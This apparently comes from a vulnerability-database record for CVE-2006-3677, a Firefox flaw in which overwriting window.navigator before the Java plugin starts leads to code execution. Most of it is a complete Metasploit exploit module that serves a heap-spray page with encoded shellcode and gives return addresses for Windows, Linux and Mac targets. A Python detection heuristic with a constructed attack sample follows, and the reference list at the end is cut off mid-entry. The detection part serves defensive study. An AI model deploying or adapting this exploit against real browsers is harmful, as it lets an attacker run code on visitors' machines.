Mozilla Firefox JavaScript Navigator Object Remote Code Execution Vulnerability

Vulnerability ID: 1110684    Vulnerability type: Configuration error
Published: 2006-07-25    Updated: 2007-09-05
CVE ID: CVE-2006-3677    CNNVD ID: CNNVD-200607-482
Platform: Multiple    CVSS score: 7.5
|Vulnerability sources
https://www.exploit-db.com/exploits/9946
https://www.securityfocus.com/bid/19192
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200607-482
|Vulnerability details
Mozilla Firefox is an open-source web browser. When Java is used in a web page, the Java plugin references properties of the window.navigator object at startup. If the page replaces the navigator object before Java starts, Firefox crashes, leading to execution of attacker-supplied code.
|Vulnerability EXP
##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core/constants'
require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::HttpServer::HTML

	include Msf::Exploit::Remote::BrowserAutopwn
	autopwn_info({
		:ua_name    => HttpClients::FF,
		:javascript => true,
		:rank       => NormalRanking, # reliable memory corruption
		:vuln_test  => %Q|
			is_vuln = false;
			if (window.navigator.javaEnabled && window.navigator.javaEnabled()){
				is_vuln = true; 
			}
			|,
	})

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Mozilla Suite/Firefox Navigator Object Code Execution',
			'Description'    => %q{
				This module exploits a code execution vulnerability in the Mozilla
			Suite, Mozilla Firefox, and Mozilla Thunderbird applications. This exploit 
			requires the Java plugin to be installed.

			},
			'License'        => MSF_LICENSE,
			'Author'         =>  ['hdm'],
			'Version'        => '$Revision$',
			'References'     => 
				[
					['CVE',    '2006-3677'],
					['OSVDB',  '27559'],
					['BID',    '19192'],
					['URL',    'http://www.mozilla.org/security/announce/mfsa2006-45.html'],
					['URL',    'http://browserfun.blogspot.com/2006/07/mobb-28-mozilla-navigator-object.html'],
				],
			'Payload'        =>
				{
					'Space'    => 512,
					'BadChars' => "",
				},
			'Targets'        =>
				[
					[ 'Firefox 1.5.0.4 Windows x86', 
						{
							'Platform' => 'win',
							'Arch' => ARCH_X86,
							'Ret'  => 0x08000800,
							'Fill' => "%u0800",
						}
					],
					[ 'Firefox 1.5.0.4 Linux x86', 
						{
							'Platform' => 'linux',
							'Arch' => ARCH_X86,
							'Ret'  => -0x58000000,
							'Fill' => "%ua8a8",
						}
					],
					[ 'Firefox 1.5.0.4 Mac OS X PPC', 
						{
							'Platform' => 'osx',
							'Arch' => ARCH_PPC,
							'Ret'  => 0x0c000000,
							'Fill' => "%u0c0c",
						}
					],
					[ 'Firefox 1.5.0.4 Mac OS X x86', 
						{
							'Platform' => 'osx',
							'Arch' => ARCH_X86,
							'Ret'  => 0x1c000000,
							'Fill' => "%u1c1c",
						}
					],
				],
			'DisclosureDate' => 'Jul 25 2006'
			))
	end

	def on_request_uri(cli, request)
	
		# Re-generate the payload
		return if ((p = regenerate_payload(cli)) == nil)

		print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...")
		send_response_html(cli, generate_html(p), { 'Content-Type' => 'text/html' })
		
		# Handle the payload
		handler(cli)
	end
	
	def generate_html(payload)

		enc_code = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))

		return %Q|
<html><head>
<script>
	function Exploit() {
		if (window.navigator.javaEnabled) {
			var shellcode = unescape("#{enc_code}");
			var b = unescape("#{target['Fill']}");
			while (b.length <= 0x400000) b+=b;

			var c = new Array();
			for (var i =0; i<36; i++) {
				c[i] = 
					b.substring(0,  0x100000 - shellcode.length) + shellcode +
					b.substring(0,  0x100000 - shellcode.length) + shellcode + 
					b.substring(0,  0x100000 - shellcode.length) + shellcode + 
					b.substring(0,  0x100000 - shellcode.length) + shellcode;
			}

			window.navigator = (#{target['Ret']} / 2);
			try {
				java.lang.reflect.Runtime.newInstance(
					java.lang.Class.forName("java.lang.Runtime"), 0
				);
			}catch(e){

			}
		}
	}
</script>
</head><body onload='Exploit()'>Please wait...</body></html>
		|
	end
end
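The description above names the trigger (replacing the window.navigator object before the Java plugin starts), and the module's HTML shows the observable markers that accompany it: a %u-encoded payload passed through unescape(), a string-doubling heap-spray loop, and a reflection call that starts the plugin. The following content-inspection heuristic is an added example, not part of the original record or of the Metasploit module; the sample pages, indicator names and thresholds are constructed for illustration.

```python
import re
from typing import List

# Constructed sample carrying the markers seen in this class of page
# (not the module's own HTML).
SAMPLE_PAGE = """<html><head><script>
function go() {
  var shellcode = unescape("%u9090%u9090%uCCCC");
  var b = unescape("%u0800");
  while (b.length <= 0x400000) b+=b;
  window.navigator = (134219776 / 2);
  try { java.lang.reflect.Runtime.newInstance(java.lang.Class.forName("java.lang.Runtime"), 0); } catch(e) {}
}
</script></head><body onload='go()'>Please wait...</body></html>"""

# Constructed benign page: reads navigator properties but never replaces the object.
BENIGN_PAGE = """<html><body><script>
if (window.navigator.javaEnabled && window.navigator.javaEnabled()) {
  document.write("Java is enabled");
}
</script></body></html>"""

# Each indicator is a regex keyed by a label; order is preserved in results.
INDICATORS = {
    # Assignment that replaces the navigator object itself (not one of its properties).
    "navigator_overwrite": re.compile(r"window\.navigator\s*=(?!=)"),
    # Heap-spray idiom: doubling a string until it reaches a multi-megabyte length.
    "heap_spray_loop": re.compile(
        r"while\s*\(\s*\w+\.length\s*<=?\s*0x[0-9a-fA-F]{6,}\s*\)\s*\w+\s*\+=\s*\w+"),
    # Two or more %uXXXX units handed to unescape(): a wide-char-encoded payload.
    "unescaped_shellcode": re.compile(r"unescape\(\s*[\"'](?:%u[0-9a-fA-F]{4}){2,}"),
    # Reflection call that forces Java plugin start-up after the overwrite.
    "java_reflection": re.compile(r"java\.lang\.reflect\.Runtime\.newInstance"),
}


def scan_page(html: str) -> List[str]:
    """Return the labels of all indicators present in the page."""
    return [name for name, rx in INDICATORS.items() if rx.search(html)]


def is_suspicious(html: str) -> bool:
    """Flag only when the navigator overwrite co-occurs with at least one other marker,
    so pages that merely read navigator properties are not reported."""
    hits = scan_page(html)
    return "navigator_overwrite" in hits and len(hits) >= 2
```

The co-occurrence rule is the point: `window.navigator` is read legitimately on countless pages, so only the replacement assignment combined with a spray or payload marker is worth an alert.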
|Affected products
Ubuntu Ubuntu Linux 5.10 sparc Ubuntu Ubuntu Linux 5.10 powerpc Ubuntu Ubuntu Linux 5.10 i386 Ubuntu Ubuntu Linux 5.10 amd64 Ubuntu Ubuntu Linux 6.06 LTS sparc Ubuntu Ubun
|References

Source: US-CERT
Name: TA06-208A
Link: http://www.us-cert.gov/cas/techalerts/TA06-208A.html
Source: US-CERT
Name: VU#670060
Link: http://www.kb.cert.org/vuls/id/670060
Source: BID
Name: 19192
Link: http://www.securityfocus.com/bid/19192
Source: VUPEN
Name: ADV-2006-2998
Link: http://www.frsirt.com/english/advisories/2006/2998
Source: SECUNIA
Name: 21229
Link: http://secunia.com/advisories/21229
Source: SECUNIA
Name: 21216
Link: http://secunia.com/advisories/21216
Source: SECUNIA
Name: 19873
Link: http://secunia.com/advisories/19873
Source: issues.rpath.com
Link: https://issues.rpath.com/browse/RPL-536
Source: XF
Name: mozilla-javascript-navigator-code-excecution(27981)
Link: http://xforce.iss.net/xforce/xfdb/27981
Source: MISC
Link: http://www.zerodayinitiative.com/advisories/ZDI-06-025.html
Source: UBUNTU
Name: USN-327-1
Link: http://www.ubuntulinux.org/support/documentation/usn/usn-327-1
Source: BID
Name: 19181
Link: http://www.securityfocus.com/bid/19181
Source: BUGTRAQ
Name: 20060727rPSA-2006-0137-1firefox
Link: http://www.securityfocus.com/archive/1/archive/1/441333/100/0/threaded
Source: BUGTRAQ
Name: 20060726ZDI-06-025:M